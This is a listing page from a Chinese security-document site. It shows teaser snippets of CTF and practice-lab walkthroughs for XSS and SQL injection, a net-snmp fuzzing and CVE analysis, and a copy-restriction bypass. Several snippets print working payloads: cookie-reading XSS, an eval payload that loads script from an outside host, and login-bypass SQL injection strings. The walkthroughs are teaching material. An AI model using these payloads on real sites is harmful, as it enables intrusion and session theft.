爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

UDP通信程序的fuzz思路与CVE-2018-18066分析

# UDP通信程序的Fuzz思路与CVE-2018-18066分析 ## 前言随着网络交互程序越来越多，传统fuzz工具如afl-fuzz对网络协议支持有限。本文介绍如何通过修改net-snmp源码，将其UDP通信转换为stdin/stdout方式，使afl-fuzz能够有效进行fuzz测试，并分析发现的CVE-2018-18066漏洞。 ## 环境准备 ### net-snmp编译安装使用ASAN和afl-clang-fast编译器进行编译： ```bash CXX=afl-c

2025-08-24 12:19:58

XSSed通关教程

# XSSed通关教程 ## 1. Basic XSS (基础XSS) ### 漏洞分析漏洞产生于直接将用户输入插入HTML页面，没有任何过滤： ```php echo($_GET['q']); ``` ### 有效Payloads 1. **基本弹窗**: ```html alert(/xss/) ``` 2. **获取Cookie**: ```html alert(document.cookie) ``` 3. **a标签XSS**: `

2025-08-24 12:08:55

DSVW通关教程

# DSVW漏洞通关教程 ## 1. SQL注入漏洞 ### 1.1 基于布尔型的盲注 (Blind SQL Injection - boolean) **原理**：响应体不会明确返回SQL错误信息，条件为真时返回正常页面，为假时返回错误页面。 **检测方法**： ```url ?id=2' # 测试单引号包裹 ?id=2 and 1=1 # 有回显 ?id=2 and 1=2 # 无回显，确认存在SQL注入 ``` **利用方法**： ```url ?id=2 order by

2025-08-24 12:08:16

xss.haozi.me通关教程

# XSS.haozi.me 通关教程 ## 0x00 基础注入 - **注入点**: 直接脚本注入 - **Payload**: `alert(1)` - **原理**: 直接注入JavaScript代码执行 ## 0x01 Textarea标签注入 - **注入点**: ``标签内 - **解决方案1**: 闭合原标签 ```html alert(1) ``` - **解决方案2**: 利用error事件 ```html ``` ## 0x02 输入框值注入 -

2025-08-24 12:07:17

XSS Challenges通关教程

# XSS Challenges通关教程 ## 概述本教程详细介绍了XSS Challenges各个阶段的通关方法，涵盖了多种XSS攻击技术和绕过技巧。通过本教程，您将学习到不同类型的XSS漏洞利用方式。 ## Stage #1 - 基础XSS注入 **漏洞描述**：最简单的XSS注入点，没有任何过滤。 **利用方法**： ```html alert(document.domain) ``` **攻击原理**：直接在search输入框中输入payload，点击search即可触发X

2025-08-24 12:06:30

XSS Game通关教程

# XSS Game通关教程详解 ## 1. Ma Spaghet! **漏洞点**：直接通过GET参数`somebody`传输用户输入，未做任何过滤。 **利用方法**： - 输入`` - 当鼠标移动到输入框时触发弹窗 **原理**：直接将用户输入插入到HTML中，可以构造任意HTML标签和事件。 ## 2. Jefff **漏洞点**：用户输入`jeff`被直接放入`eval()`函数中执行。 **利用方法**： ``` ?jeff="-alert(1337)-" 或 ?jef

2025-08-24 12:05:49

独孤九剑xss通关教程

# 独孤九剑XSS通关教程详解 ## 第一式：基础HTML编码绕过 **过滤规则**：过滤了 `=()` **绕过方法**： - 在SVG标签下的script标签可以使用HTML编码 - 利用HTML编码绕过对`=()`的过滤 **构造payload**： ```html ?data=">eval(location.hash.slice(1))#with(document)body.appendChild(createElement('script')).src='http://xcao

2025-08-24 12:05:00

Webug4.0靶场通关

# Webug4.0靶场通关全面教学指南 ## 1. SQL注入攻击技术详解 ### 1.1 显错注入 **注入点识别**: - 目标URL: `control/sqlinject/manifest_error.php?id=1` - 判断注入类型: - 输入`and 1=1`和`and 1=2`都正常 → 非数字型 - 输入单引号`'`页面变化 → 字符型 - 输入`' -- q`注释后正常 → 确认字符型 **攻击步骤**: 1. 判断字段数: ```sql

2025-08-24 12:03:39

去除某网上图书馆的复制限制

# 去除网上图书馆复制限制的技术分析 ## 0x01 问题描述许多在线图书馆或文档网站会通过JavaScript技术限制用户的复制操作，常见的限制包括： - 禁用右键菜单 - 拦截复制操作 - 要求登录或付费后才能复制本文以某网上图书馆为例，分析其复制限制机制并提供多种解除方法。 ## 0x02 右键点击事件分析 ### 现象观察 - 正常页面右键点击会显示浏览器默认右键菜单 - 目标网站右键点击时显示自定义提示或完全无响应 ### 技术原理网站通过覆盖`oncontextme

2025-08-24 12:02:35

网络安全实验室1.选择题和2.基础关

# 网络安全实验室教学文档：选择题与基础关解析 ## 一、选择题知识点解析 ### 1. 加密机制协议 **问题**：主要用于加密机制的协议是() **答案**：SSL **知识点**： - SSL(Secure Sockets Layer)是用于加密网络通信的安全协议 - 现已被TLS(Transport Layer Security)取代，但习惯上仍称SSL - 提供数据加密、身份验证和数据完整性保护 ### 2. 攻击手段识别 **问题**：向有限的空间输入超长的字符串是哪一种攻击手

2025-08-24 12:01:50

网络安全实验室3.脚本关

# 网络安全实验室脚本关教学文档 ## 1. Key查找 **目标URL**: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php **解决方法**: 1. 使用Burp Suite抓包 2. 将请求发送到重放模块(Repeater) 3. 点击"Go"按钮执行请求 4. 在响应中查找key **关键点**: - 直接访问页面可能看不到key - 需要通过抓包工具查看完整响应 **获取的key*

2025-08-24 11:59:35

网络安全实验室4.注入关

# SQL注入攻击技术详解 ## 1. 基础SQL注入 ### 1.1 最简单的SQL注入 **目标URL**: `http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php` **攻击方法**: 1. 查看源代码，发现登录名为`admin` 2. 在登录名输入框中输入: `admin' or '1'='1` 3. 密码可随意填写 4. 输入正确的验证码后登录 **原理**: 构造的SQL语句使条件永

2025-08-24 11:47:47

跳转到页